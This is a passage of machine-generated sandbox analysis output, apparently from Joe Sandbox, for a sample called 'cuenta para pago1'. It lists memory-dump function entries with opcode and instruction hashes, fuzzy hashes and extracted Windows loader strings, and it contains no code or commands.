                                                                                      • Instruction Fuzzy Hash: 97319035302B1AEFEB859F64C940E8AFBA9FF44794F404225E91157A50EBB0ED21DF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RedirectedKey, xrefs: 3499B60E
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3499B5C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                      • API String ID: 0-1388552009
                                                                                      • Opcode ID: 8a5813277471ab9f312ab33476ae148573c90287475515ef273c4310f6971969
                                                                                      • Instruction ID: 4401db64abae3a28077e925643cfe5e6ac99605938e09e5b57c10abb9aa0eb28
                                                                                      • Opcode Fuzzy Hash: 8a5813277471ab9f312ab33476ae148573c90287475515ef273c4310f6971969
                                                                                      • Instruction Fuzzy Hash: EE61F2B5C01219EFDF11CFA4C888ADEBBB9FB48710F50416AE805E7250DB749A46DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$
                                                                                      • API String ID: 3446177414-233714265
                                                                                      • Opcode ID: 42254848fa5576890d97c23f5fcdc5f7d29e7ad41ee6698e4b140d51ee62497c
                                                                                      • Instruction ID: d64b050e83a63d0057c55b33e0c961293cca29780c62ff5dcf32719f66d214e1
                                                                                      • Opcode Fuzzy Hash: 42254848fa5576890d97c23f5fcdc5f7d29e7ad41ee6698e4b140d51ee62497c
                                                                                      • Instruction Fuzzy Hash: 5261EEB5A02749CFEB20DFA8C590B9DB7F1FF45308F104669D2146B690CBB5A981EB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 348CA229
                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 348CA21B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                      • API String ID: 0-2876891731
                                                                                      • Opcode ID: da03861bcb92a14fdcb812fa8e54973019a59a52aa86a3e16c0f5bd6829b9821
                                                                                      • Instruction ID: bfac0379158bc23e3e2763c1c320fef163bc4a9e8c66ad5b7ad1e6af7553e666
                                                                                      • Opcode Fuzzy Hash: da03861bcb92a14fdcb812fa8e54973019a59a52aa86a3e16c0f5bd6829b9821
                                                                                      • Instruction Fuzzy Hash: EA41DD79B00768DFEB01CF99D940BAAB7B8EF45744F2042A9E810DF2A5E676DD00CB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: 63450546733e00d70d9601db211c5ed90aa72a66d21ceb25b98d92fb586e02d8
                                                                                      • Instruction ID: dedd337326524f2ffffd837b81150f819329c52e61a3f10c157baeeec789bbd2
                                                                                      • Opcode Fuzzy Hash: 63450546733e00d70d9601db211c5ed90aa72a66d21ceb25b98d92fb586e02d8
                                                                                      • Instruction Fuzzy Hash: E231C176209B41DFE321DB69E840B1AB7E8EF89750F20099DF854CB3A1EB71D905CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local\$@
                                                                                      • API String ID: 0-380025441
                                                                                      • Opcode ID: d189fbb91a51a7a542f1ed95a099d341e29745688bfbc3a15fe0913da2afa432
                                                                                      • Instruction ID: 62a42a085c39cc266347f5bcf1a1f830b575c6430e03588df7dee50a2f2689ae
                                                                                      • Opcode Fuzzy Hash: d189fbb91a51a7a542f1ed95a099d341e29745688bfbc3a15fe0913da2afa432
                                                                                      • Instruction Fuzzy Hash: 3E3191B6649305EFE311DF68D880A5BBBE8FB85654F400A2EF99487250D735DD08CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: MUI
                                                                                      • API String ID: 0-1339004836
                                                                                      • Opcode ID: 3027d666656b8a6155f359df0a89277372d69cfb65f5ddcff2c0a27378efaa5d
                                                                                      • Instruction ID: d8323953e68d0506906c46099d55a0c458528d23d70dbdca6e6cbf274d29a312
                                                                                      • Opcode Fuzzy Hash: 3027d666656b8a6155f359df0a89277372d69cfb65f5ddcff2c0a27378efaa5d
                                                                                      • Instruction Fuzzy Hash: 648239B9E00218CFEB14DFA9C880B9DF7B5BF48754F10826AD859AB250EB74DD85CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d20feb0d80d398518ee454d07ba812ab57a12e97eb94caa6527275bd04c70b01
                                                                                      • Instruction ID: 0002e6b8dba620e39072ff04183132255895634c9bcf25a61c35037951fd8359
                                                                                      • Opcode Fuzzy Hash: d20feb0d80d398518ee454d07ba812ab57a12e97eb94caa6527275bd04c70b01
                                                                                      • Instruction Fuzzy Hash: 84E18874609342CFD304CF28C090A5AFBE1FF89354F558A6DE999A7361DB31E906CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #%u
                                                                                      • API String ID: 0-232158463
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EXT-
                                                                                      • API String ID: 0-1948896318
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryHash
                                                                                      • API String ID: 0-2202222882
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: 3w3w
                                                                                      • API String ID: 3446177414-4263324190
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryName
                                                                                      • API String ID: 0-215506332
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b244b26ba555983dc9ca6c0f287f38642b4543e44d4744900e2ae5003ea115ce
                                                                                      • Instruction ID: 89d836ab976f354c6847ecf39955d621ba8de14f4a167dcca0cb2d75200cfe98
                                                                                      • Opcode Fuzzy Hash: b244b26ba555983dc9ca6c0f287f38642b4543e44d4744900e2ae5003ea115ce
                                                                                      • Instruction Fuzzy Hash: D5327CB6E01219DFDF14CFA8C880ABEBBB5FF45744F144269E805AB391E7359941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 330894ef0c6b65d52f5df9fcb04f4176509c274d6fa64bd98594656eab27bb6e
                                                                                      • Instruction ID: 4013a33a0731729acbdbc114f3810092d38fb7f07e948e3e6cf83e8adf29b54a
                                                                                      • Opcode Fuzzy Hash: 330894ef0c6b65d52f5df9fcb04f4176509c274d6fa64bd98594656eab27bb6e
                                                                                      • Instruction Fuzzy Hash: 0232DE74A00759CFEB24CF69C840BAEBBFABF85744F20412DD4459BA98DB35AD42CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93df9a6d379c5b16e388dc0018a49f9a914302a6f342529ee8564f036dc945a3
                                                                                      • Instruction ID: c207f10fb7a620465160dd9d6d4b4e7eb6fbfcbcb303a8f763d137973ac32115
                                                                                      • Opcode Fuzzy Hash: 93df9a6d379c5b16e388dc0018a49f9a914302a6f342529ee8564f036dc945a3
                                                                                      • Instruction Fuzzy Hash: 78C1A175A103199FEB24CB69C840BAEF7B5FF88314F54866DE864AB284D774ED41CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2eed7afb1d203e508ebd31674426e4b1f1dfe457116cd1ed2711c5b39f0979d9
                                                                                      • Instruction ID: 19ed152359e9c726bf6a0d5dd34eca6fa3e5df77600257e652170ddc0483a24b
                                                                                      • Opcode Fuzzy Hash: 2eed7afb1d203e508ebd31674426e4b1f1dfe457116cd1ed2711c5b39f0979d9
                                                                                      • Instruction Fuzzy Hash: 14D1F2B5A01205DFEB51CF68C980B9A7BF9BF49340F1481BAED099B216DB71D905CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f53c826e6eafbabeae93ab8532c36e7604c1692d3e6fc0481fa32be4b48d6c73
                                                                                      • Instruction ID: 52c5c9243851cdfe2d186de29501a05d8462c559d24c677bdd6bf3a84818f028
                                                                                      • Opcode Fuzzy Hash: f53c826e6eafbabeae93ab8532c36e7604c1692d3e6fc0481fa32be4b48d6c73
                                                                                      • Instruction Fuzzy Hash: 3AC12576A02228CFEB04CF18C4A077977B6FF4A744F554299EA429F391E7309E41DB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f075c1610a166f37d56400d128ea6fab550d5ed1d9e6fb8ec363bcb178706924
                                                                                      • Instruction ID: ffb08bd45fe016609c53f9a9e5ee9c868418927b1e36661fd3caefa0cf2d026b
                                                                                      • Opcode Fuzzy Hash: f075c1610a166f37d56400d128ea6fab550d5ed1d9e6fb8ec363bcb178706924
                                                                                      • Instruction Fuzzy Hash: 9FC136B5A01609DFEB15CFA9D880A9EBBF4FB48750F10456EE416AB350EB34AD02CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                      • Instruction ID: 688f2494ff1402769bcefcdc47fbdd647e705f7ee01ee8136db32a9775e98d40
                                                                                      • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                      • Instruction Fuzzy Hash: BAB12675701709EFEB15CBA8C890BAEBBFAAF86308F140669D551DB285DB30ED41CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4acc114fbc837e2f7bba8279cb235cff9c32da8aeff79b079a33783adbc2b6cf
                                                                                      • Instruction ID: 6506250323f3d6cbbf257a98a7a0f1d27619df9fae193a95b6f9702b0d9a0b11
                                                                                      • Opcode Fuzzy Hash: 4acc114fbc837e2f7bba8279cb235cff9c32da8aeff79b079a33783adbc2b6cf
                                                                                      • Instruction Fuzzy Hash: A8C15774208344CFE360CF19C494BABB7E8BF88344F444A6DE99987291D775E908CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70ccd95bef9d35c2e5c88d04a61059e1f324c59e8cc16a678e10ee1db159d6c5
                                                                                      • Instruction ID: 7be25a7b9a04618b6e41e5251a4dd191daab44a27ef4310a5dc7fb4338dbbf66
                                                                                      • Opcode Fuzzy Hash: 70ccd95bef9d35c2e5c88d04a61059e1f324c59e8cc16a678e10ee1db159d6c5
                                                                                      • Instruction Fuzzy Hash: A1A1CF75B01716DFEB15CF69D980BAAB7B9FF44354F418129E909A7281EB34E841CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f3bd7a65a52ad06783389871624b6c32fada9f4be9a1635a8af44fe02d68404
                                                                                      • Instruction ID: 80fe21dfa7267dd90147f813a755e4ed692b103d512fb45ce0c44313c135f4f6
                                                                                      • Opcode Fuzzy Hash: 3f3bd7a65a52ad06783389871624b6c32fada9f4be9a1635a8af44fe02d68404
                                                                                      • Instruction Fuzzy Hash: 9B41C3B5750615AFE715CA2EC890B6BB7AEEFC07A0F40829DE825C7291DB34D801C7B1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f6a6365660fbe3e088a202287fcfa5f48ba21f95b5a827cc5ecca074cd7fcc5e
                                                                                      • Instruction ID: 68b15a30ddd2241113a95923577da56cce31578db17b3acc709547ae820e0822
                                                                                      • Opcode Fuzzy Hash: f6a6365660fbe3e088a202287fcfa5f48ba21f95b5a827cc5ecca074cd7fcc5e
                                                                                      • Instruction Fuzzy Hash: BC515BB5A06329DFFF51CAA8C840B9EB7F8AB49794F110219E911F7250DBB4ED408B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
